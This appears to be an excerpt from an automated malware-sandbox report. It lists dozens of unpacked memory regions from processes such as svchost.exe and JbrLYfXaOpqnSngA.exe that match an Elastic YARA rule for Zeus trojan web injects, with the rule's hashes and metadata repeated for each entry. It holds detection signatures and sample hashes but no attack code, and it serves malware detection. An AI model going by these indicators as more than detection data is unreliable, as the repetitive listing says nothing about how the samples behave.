      Source: 1.3.svchost.exe.39e0000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2570000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2606c00.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.3.Bonelessness.exe.868460.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.a00000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.3.Bonelessness.exe.86e060.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
